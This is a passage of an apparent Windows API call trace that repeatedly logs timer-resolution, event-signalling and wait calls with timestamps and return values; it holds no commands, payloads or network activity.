(hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0165.906] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0165.906] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0165.990] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0165.996] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0165.999] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0166.002] SetEvent (hEvent=0x128) returned 1 [0166.002] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0166.040] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0166.063] SetEvent (hEvent=0x128) returned 1 [0166.063] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0166.068] timeEndPeriod (uPeriod=0x1) returned 0x0 [0166.068] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0167.823] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0167.823] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0167.951] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0167.994] SetEvent (hEvent=0x128) returned 1 [0167.994] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0168.042] timeEndPeriod (uPeriod=0x1) returned 0x0 [0168.042] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0168.132] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0168.132] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0168.156] SetEvent (hEvent=0x128) returned 1 [0168.156] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0168.185] timeEndPeriod (uPeriod=0x1) returned 0x0 [0168.185] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0169.973] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0169.973] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0170.102] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0170.113] SetEvent (hEvent=0x128) returned 1 [0170.113] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0170.120] timeEndPeriod (uPeriod=0x1) returned 0x0 [0170.120] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0170.169] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0170.169] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0170.200] SetEvent (hEvent=0x128) returned 1 [0170.200] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0170.213] timeEndPeriod (uPeriod=0x1) returned 0x0 [0170.213] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0171.899] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0171.899] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0171.917] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0172.001] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0172.028] SetEvent (hEvent=0x128) returned 1 [0172.028] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0172.033] timeEndPeriod (uPeriod=0x1) returned 0x0 [0172.034] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0172.081] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0172.081] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0172.113] SetEvent (hEvent=0x128) returned 1 [0172.113] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0172.126] timeEndPeriod (uPeriod=0x1) returned 0x0 [0172.126] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0174.433] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0174.433] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0174.452] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0174.503] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0174.519] SetEvent (hEvent=0x128) returned 1 [0174.519] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0174.521] timeEndPeriod (uPeriod=0x1) returned 0x0 [0174.521] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0174.671] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0174.671] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0175.051] SetEvent (hEvent=0x128) returned 1 [0175.051] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0175.348] timeEndPeriod (uPeriod=0x1) returned 0x0 [0175.348] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0176.811] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0176.811] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0176.823] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0176.857] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0176.860] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0176.871] SetEvent (hEvent=0x128) returned 1 [0176.871] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0176.910] timeEndPeriod (uPeriod=0x1) returned 0x0 [0176.910] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0176.988] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0176.988] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0177.359] SetEvent (hEvent=0x128) returned 1 [0177.359] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0177.370] timeEndPeriod (uPeriod=0x1) returned 0x0 [0177.370] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0180.145] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0180.145] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0180.159] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0180.200] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0180.204] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0180.207] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0180.211] SetEvent (hEvent=0x128) returned 1 [0180.211] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0180.227] timeEndPeriod (uPeriod=0x1) returned 0x0 [0180.227] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0180.273] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0180.273] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0180.310] SetEvent (hEvent=0x128) returned 1 [0180.310] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0180.319] timeEndPeriod (uPeriod=0x1) returned 0x0 [0180.319] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0181.941] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0181.942] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0181.981] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0181.984] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0181.989] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0181.992] SetEvent (hEvent=0x128) returned 1 [0181.992] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0181.996] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0182.041] SetEvent (hEvent=0x128) returned 1 [0182.041] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0182.070] timeEndPeriod (uPeriod=0x1) returned 0x0 [0182.070] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0183.837] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0183.838] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0183.840] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0183.877] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0183.879] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0183.884] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0183.941] SetEvent (hEvent=0x128) returned 1 [0183.941] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0183.944] timeEndPeriod (uPeriod=0x1) returned 0x0 [0183.944] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0183.989] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0183.989] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0184.007] SetEvent (hEvent=0x128) returned 1 [0184.008] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0184.031] timeEndPeriod (uPeriod=0x1) returned 0x0 [0184.031] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0186.671] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0186.671] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0186.680] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0186.712] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0186.716] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0186.722] SetEvent (hEvent=0x128) returned 1 [0186.723] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0186.726] timeEndPeriod (uPeriod=0x1) returned 0x0 [0186.727] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0186.770] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0186.770] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0186.811] SetEvent (hEvent=0x128) returned 1 [0186.811] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0186.863] timeEndPeriod (uPeriod=0x1) returned 0x0 [0186.863] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0190.769] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0190.769] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0190.783] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0190.854] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0190.857] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0190.861] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0190.865] SetEvent (hEvent=0x128) returned 1 [0190.865] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0190.868] timeEndPeriod (uPeriod=0x1) returned 0x0 [0190.868] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0190.911] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0190.911] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0190.939] SetEvent (hEvent=0x128) returned 1 [0190.939] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0190.960] timeEndPeriod (uPeriod=0x1) returned 0x0 [0190.960] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0193.385] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0193.385] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0193.387] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0193.431] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0193.434] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0193.436] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0193.442] SetEvent (hEvent=0x128) returned 1 [0193.442] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0193.445] timeEndPeriod (uPeriod=0x1) returned 0x0 [0193.445] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0193.495] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0193.495] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0193.520] SetEvent (hEvent=0x128) returned 1 [0193.520] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0193.540] timeEndPeriod (uPeriod=0x1) returned 0x0 [0193.540] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0200.536] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0200.537] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0200.539] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0200.579] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0200.581] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0200.583] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0200.588] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0200.592] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0200.654] SetEvent (hEvent=0x128) returned 1 [0200.654] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0200.683] timeEndPeriod (uPeriod=0x1) returned 0x0 [0200.683] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0202.658] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0202.658] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0202.710] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0202.714] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0202.717] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0202.724] SetEvent (hEvent=0x128) returned 1 [0202.724] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0202.730] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0202.767] SetEvent (hEvent=0x128) returned 1 [0202.767] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0202.791] timeEndPeriod (uPeriod=0x1) returned 0x0 [0202.791] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0204.198] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0204.198] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0204.200] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0204.248] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0204.251] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0204.254] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0204.259] SetEvent (hEvent=0x128) returned 1 [0204.259] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0204.271] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0204.309] SetEvent (hEvent=0x128) returned 1 [0204.309] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0204.327] timeEndPeriod (uPeriod=0x1) returned 0x0 [0204.327] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0205.990] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0205.990] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0206.005] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0206.045] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0206.047] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0206.050] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0206.053] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0206.055] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0206.093] SetEvent (hEvent=0x128) returned 1 [0206.093] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0206.113] timeEndPeriod (uPeriod=0x1) returned 0x0 [0206.113] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0207.778] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0207.778] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0207.780] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0207.830] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0207.835] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0207.837] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0207.840] SetEvent (hEvent=0x128) returned 1 [0207.840] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0207.878] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0207.895] SetEvent (hEvent=0x128) returned 1 [0207.896] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0207.898] timeEndPeriod (uPeriod=0x1) returned 0x0 [0207.898] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0210.040] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0210.040] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0210.043] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0210.046] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0210.058] SetEvent (hEvent=0x128) returned 1 [0210.058] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0210.100] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0210.124] SetEvent (hEvent=0x128) returned 1 [0210.124] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0210.126] timeEndPeriod (uPeriod=0x1) returned 0x0 [0210.126] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0211.606] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0211.607] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0211.737] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0211.761] SetEvent (hEvent=0x128) returned 1 [0211.761] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0211.767] timeEndPeriod (uPeriod=0x1) returned 0x0 [0211.767] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0211.862] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0211.862] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0211.893] SetEvent (hEvent=0x128) returned 1 [0211.893] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0211.948] timeEndPeriod (uPeriod=0x1) returned 0x0 [0211.948] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0214.001] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0214.001] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0214.017] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0214.059] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0214.063] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0214.073] SetEvent (hEvent=0x128) returned 1 [0214.073] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0214.141] timeEndPeriod (uPeriod=0x1) returned 0x0 [0214.141] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0214.187] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0214.187] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0214.234] SetEvent (hEvent=0x128) returned 1 [0214.234] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0214.240] timeEndPeriod (uPeriod=0x1) returned 0x0 [0214.241] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0216.133] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0216.134] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0216.137] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0216.186] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0216.194] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0216.198] SetEvent (hEvent=0x128) returned 1 [0216.198] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0216.201] timeEndPeriod (uPeriod=0x1) returned 0x0 [0216.201] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0216.252] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0216.252] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0216.282] SetEvent (hEvent=0x128) returned 1 [0216.282] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0216.295] timeEndPeriod (uPeriod=0x1) returned 0x0 [0216.296] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0217.866] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0217.867] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0217.868] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0217.917] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0217.924] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0217.926] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0217.928] SetEvent (hEvent=0x128) returned 1 [0217.928] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0217.932] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0217.971] SetEvent (hEvent=0x128) returned 1 [0217.971] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0217.989] timeEndPeriod (uPeriod=0x1) returned 0x0 [0217.989] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0219.112] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0219.112] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0219.125] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0219.163] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0219.165] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0219.171] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0219.172] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0219.175] SetEvent (hEvent=0x128) returned 1 [0219.175] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0219.218] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0219.241] SetEvent (hEvent=0x128) returned 1 [0219.241] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0219.247] timeEndPeriod (uPeriod=0x1) returned 0x0 [0219.247] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0222.373] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0222.373] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0222.422] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0222.424] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0222.428] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0222.467] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0222.501] SetEvent (hEvent=0x128) returned 1 [0222.501] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0222.504] timeEndPeriod (uPeriod=0x1) returned 0x0 [0222.504] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0223.681] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0223.681] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0223.682] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0223.712] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0223.753] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0223.783] SetEvent (hEvent=0x128) returned 1 [0223.783] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0223.784] timeEndPeriod (uPeriod=0x1) returned 0x0 [0223.784] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0224.855] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0224.855] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0224.856] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0224.901] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0224.903] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0224.904] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0224.943] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0225.018] SetEvent (hEvent=0x128) returned 1 [0225.018] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0225.032] timeEndPeriod (uPeriod=0x1) returned 